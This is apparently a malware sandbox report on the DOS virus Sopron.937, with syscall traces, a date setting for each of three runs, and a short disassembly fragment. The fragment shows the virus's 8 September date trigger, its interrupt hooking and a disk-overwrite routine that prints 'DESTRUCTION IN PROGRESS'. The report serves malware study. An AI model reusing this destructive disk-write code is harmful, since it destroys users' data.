Sample viewer

vx.netlux.org/Virus.DOS.Sopron.937

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-17T23:15:34.129429091Z 37 PC: 12abb | Set interrupt vector (Interrupt = '1' AKA 'Character input')
2018-12-17T23:15:34.13525008Z 37 PC: 12abf | Set interrupt vector (Interrupt = '3' AKA 'Auxiliary input')
2018-12-17T23:15:34.136958985Z 42 PC: 12b20 | Get date 0x12b20: cmp dx, 0x908
0x12b24: jne 0x12b40
0x12b26: mov dx, si
0x12b28: add dx, 0x3f5
0x12b2c: push cs
0x12b2d: pop ds
0x12b2e: mov ah, 9
0x12b30: int 0x21
0x12b32: mov dl, 0x80
0x12b34: xor dh, dh
0x12b36: mov cx, 1
0x12b39: mov ax, 0x310
0x12b3c: int 0x13
0x12b3e: cli
0x12b3f: hlt
0x12b40: mov ax, 0xabcd
0x12b43: int 0x21
0x12b45: cmp ax, 0x908
0x12b48: je 0x12b9f
0x12b4a: push es
2018-12-17T23:15:34.139208854Z 171 PC: 12b45 | UNKNOWN!
2018-12-17T23:15:34.142458382Z 74 PC: 12b5e | Reallocate memory
2018-12-17T23:15:34.143863018Z 72 PC: 12b65 | Allocate memory
2018-12-17T23:15:34.145392025Z 53 PC: 12b8e | Get interrupt vector (Interrupt = '33' AKA 'Random read')
2018-12-17T23:15:34.146531883Z 37 PC: 12b9e | Set interrupt vector (Interrupt = '33' AKA 'Random read')

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":7006,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T13:07:09.519081372Z 37 PC: 12abb | Set interrupt vector (Interrupt = '1' AKA 'Character input')
2018-12-25T13:07:09.520388198Z 37 PC: 12abf | Set interrupt vector (Interrupt = '3' AKA 'Auxiliary input')
2018-12-25T13:07:09.521449942Z 42 PC: 12b20 | Get date 0x12b20: cmp dx, 0x908
0x12b24: jne 0x12b40
0x12b26: mov dx, si
0x12b28: add dx, 0x3f5
0x12b2c: push cs
0x12b2d: pop ds
0x12b2e: mov ah, 9
0x12b30: int 0x21
0x12b32: mov dl, 0x80
0x12b34: xor dh, dh
0x12b36: mov cx, 1
0x12b39: mov ax, 0x310
0x12b3c: int 0x13
0x12b3e: cli
0x12b3f: hlt
0x12b40: mov ax, 0xabcd
0x12b43: int 0x21
0x12b45: cmp ax, 0x908
0x12b48: je 0x12b9f
0x12b4a: push es
2018-12-25T13:07:09.523222577Z 171 PC: 12b45 | UNKNOWN!
2018-12-25T13:07:09.524612835Z 74 PC: 12b5e | Reallocate memory
2018-12-25T13:07:09.525523654Z 72 PC: 12b65 | Allocate memory
2018-12-25T13:07:09.52652365Z 53 PC: 12b8e | Get interrupt vector (Interrupt = '33' AKA 'Random read')
2018-12-25T13:07:09.527406266Z 37 PC: 12b9e | Set interrupt vector (Interrupt = '33' AKA 'Random read')

{"DateBased":true,"Day":8,"Month":9,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":7006,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:00:48.873107183Z 37 PC: 12abb | Set interrupt vector (Interrupt = '1' AKA 'Character input')
2018-12-25T12:00:48.874353796Z 37 PC: 12abf | Set interrupt vector (Interrupt = '3' AKA 'Auxiliary input')
2018-12-25T12:00:48.876355995Z 42 PC: 12b20 | Get date 0x12b20: cmp dx, 0x908
0x12b24: jne 0x12b40
0x12b26: mov dx, si
0x12b28: add dx, 0x3f5
0x12b2c: push cs
0x12b2d: pop ds
0x12b2e: mov ah, 9
0x12b30: int 0x21
0x12b32: mov dl, 0x80
0x12b34: xor dh, dh
0x12b36: mov cx, 1
0x12b39: mov ax, 0x310
0x12b3c: int 0x13
0x12b3e: cli
0x12b3f: hlt
0x12b40: mov ax, 0xabcd
0x12b43: int 0x21
0x12b45: cmp ax, 0x908
0x12b48: je 0x12b9f
0x12b4a: push es
2018-12-25T12:00:48.878735868Z 9 PC: 12b32 | Display string (String= '�  HDD-CLEANER Version 2.0   Copyright (c) 1997 (1st JAN)   Made in Hungary, Sopron  DESTRUCTION IN PROGRESS...')